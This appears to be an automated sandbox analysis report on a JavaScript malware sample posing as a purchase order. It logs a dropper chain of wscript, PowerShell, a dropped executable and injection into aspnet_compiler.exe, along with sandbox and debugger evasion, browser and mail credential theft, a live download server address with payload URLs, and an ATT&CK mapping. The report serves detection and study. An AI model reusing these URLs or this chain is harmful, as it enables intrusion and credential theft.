                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 1600000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 3190000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4055Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3156Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RUNPEE.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4344Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe TID: 2744Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe TID: 1340Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000009.00000002.1367801539.000001BED9ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
                    Source: aspnet_compiler.exe, 0000000C.00000002.2454758646.00000000031C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: aspnet_compiler.exe, 0000000C.00000002.2454758646.00000000031C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: aspnet_compiler.exe, 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: powershell.exe, 00000009.00000002.1367801539.000001BED9ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: QWQWSAADAF.exe, 0000000B.00000002.1361113372.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454137714.0000000001707000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01607298 CheckRemoteDebuggerPresent,12_2_01607298
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\System32\wscript.exeNetwork Connect: 176.65.144.3 80Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 11E3008Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe "C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RUNPEE.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.QWQWSAADAF.exe.3fd95b0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: QWQWSAADAF.exe PID: 2976, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5376, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.QWQWSAADAF.exe.3fd95b0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2454758646.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: QWQWSAADAF.exe PID: 2976, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5376, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.QWQWSAADAF.exe.3fd95b0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: QWQWSAADAF.exe PID: 2976, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5376, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information52
                    Scripting
                    Valid Accounts231
                    Windows Management Instrumentation
                    52
                    Scripting
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    11
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    411
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    34
                    System Information Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    1
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    PowerShell
                    Logon Script (Windows)Logon Script (Windows)4
                    Obfuscated Files or Information
                    Security Account Manager631
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model1
                    Input Capture
                    22
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp
                    LSA Secrets261
                    Virtualization/Sandbox Evasion
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading
                    DCSync1
                    System Network Configuration Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job261
                    Virtualization/Sandbox Evasion
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                    Process Injection
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1641301 Sample: PO_111101111001.js Startdate: 18/03/2025 Architecture: WINDOWS Score: 100 34 ip-api.com 2->34 36 212.20.149.52.in-addr.arpa 2->36 38 206.23.85.13.in-addr.arpa 2->38 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 13 other signatures 2->50 9 wscript.exe 1 16 2->9         started        signatures3 process4 dnsIp5 42 176.65.144.3, 49721, 49723, 80 PALTEL-ASPALTELAutonomousSystemPS Germany 9->42 30 C:\Temp\WTRTRWFSHS.ps1, ASCII 9->30 dropped 68 System process connects to network (likely due to code injection or exploit) 9->68 70 JScript performs obfuscated calls to suspicious functions 9->70 72 Wscript starts Powershell (via cmd or directly) 9->72 74 2 other signatures 9->74 14 powershell.exe 13 9->14         started        file6 signatures7 process8 file9 32 C:\Users\user\AppData\...\QWQWSAADAF.exe, PE32 14->32 dropped 76 Found suspicious powershell code related to unpacking or dynamic code loading 14->76 78 Powershell drops PE file 14->78 18 QWQWSAADAF.exe 15 4 14->18         started        22 conhost.exe 14->22         started        signatures10 process11 file12 28 C:\Users\user\AppData\Local\Temp\RUNPEE.dll, PE32 18->28 dropped 52 Antivirus detection for dropped file 18->52 54 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->54 56 Writes to foreign memory regions 18->56 58 2 other signatures 18->58 24 aspnet_compiler.exe 14 2 18->24         started        signatures13 process14 dnsIp15 40 ip-api.com 208.95.112.1, 49724, 80 TUT-ASUS United States 24->40 60 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 24->60 62 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 24->62 64 Tries to steal Mail credentials (via file / registry access) 24->64 66 3 other signatures 24->66 signatures16

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    PO_111101111001.js28%ReversingLabsWin32.Trojan.Generic
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\RUNPEE.dll100%AviraHEUR/AGEN.1300034
                    C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe100%AviraTR/Dropper.MSIL.Gen
                    C:\Users\user\AppData\Local\Temp\RUNPEE.dll71%ReversingLabsByteCode-MSIL.Trojan.BotX
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://176.65.144.3/dev/devil.ps10%Avira URL Cloudsafe
                    http://176.65.144.3/dev/DEV.exe0%Avira URL Cloudsafe
                    http://176.65.144.3/dev/DEV.exeP0%Avira URL Cloudsafe

                    Download Network PCAP: filteredfull

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ip-api.com
                    208.95.112.1
                    truefalse
                      high
                      206.23.85.13.in-addr.arpa
                      unknown
                      unknownfalse
                        high
                        212.20.149.52.in-addr.arpa
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://176.65.144.3/dev/devil.ps1true
                          • Avira URL Cloud: safe
                          unknown
                          http://176.65.144.3/dev/DEV.exetrue
                          • Avira URL Cloud: safe
                          unknown
                          http://ip-api.com/line/?fields=hostingfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1361439763.000001BED1E03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1361439763.000001BED1C5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000009.00000002.1344482429.000001BEC31F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://account.dyn.com/QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                  high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.1344482429.000001BEC1E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.1344482429.000001BEC1E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1361439763.000001BED1E03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1361439763.000001BED1C5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/Licensepowershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://176.65.144.3QWQWSAADAF.exe, 0000000B.00000002.1365843658.00000000027E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://ip-api.comaspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003276000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003191000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003258000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Iconpowershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://oneget.orgXpowershell.exe, 00000009.00000002.1344482429.000001BEC31F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://176.65.144.3/dev/DEV.exePQWQWSAADAF.exe, 0000000B.00000002.1365843658.0000000002781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000009.00000002.1344482429.000001BEC1BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.1344482429.000001BEC1BE1000.00000004.00000800.00020000.00000000.sdmp, QWQWSAADAF.exe, 0000000B.00000002.1365843658.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003191000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003258000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.1344482429.000001BEC1E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://oneget.orgpowershell.exe, 00000009.00000002.1344482429.000001BEC31F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            208.95.112.1
                                                            ip-api.comUnited States
                                                            53334TUT-ASUSfalse
                                                            176.65.144.3
                                                            unknownGermany
                                                            12975PALTEL-ASPALTELAutonomousSystemPStrue
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1641301
                                                            Start date and time:2025-03-18 08:02:07 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 35s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:15
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • GSI enabled (Javascript)
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:PO_111101111001.js
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.expl.evad.winJS@8/8@3/2
                                                            EGA Information:
                                                            • Successful, ratio: 66.7%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 39
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .js
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 23.199.214.10, 172.202.163.200, 13.85.23.206, 52.149.20.212, 20.109.210.53
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target powershell.exe, PID 8152 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            TimeTypeDescription
                                                            03:03:20API Interceptor8x Sleep call for process: powershell.exe modified
                                                            03:03:22API Interceptor1x Sleep call for process: QWQWSAADAF.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            208.95.112.173ybGtnYXx.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                            • ip-api.com/line?fields=query,country
                                                            yeah.exeGet hashmaliciousXWormBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            PO-2513203-PDF.jsGet hashmaliciousAgentTeslaBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            Q3N5HdmTIp.exeGet hashmaliciousUnknownBrowse
                                                            • ip-api.com/line?fields=query
                                                            Q3N5HdmTIp.exeGet hashmaliciousUnknownBrowse
                                                            • ip-api.com/line?fields=query
                                                            XWCTtOuD5e.exeGet hashmaliciousPython Stealer, Exela Stealer, NjratBrowse
                                                            • ip-api.com/json
                                                            WindowsDefender.exeGet hashmaliciousPython Stealer, Blank Grabber, Umbral StealerBrowse
                                                            • ip-api.com/json/?fields=225545
                                                            Setup.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                            • ip-api.com/json/?fields=225545
                                                            Planck Scale Lantern.exeGet hashmaliciousPureLog Stealer, XWorm, zgRATBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            Setup(1).exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                            • ip-api.com/json/?fields=225545
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
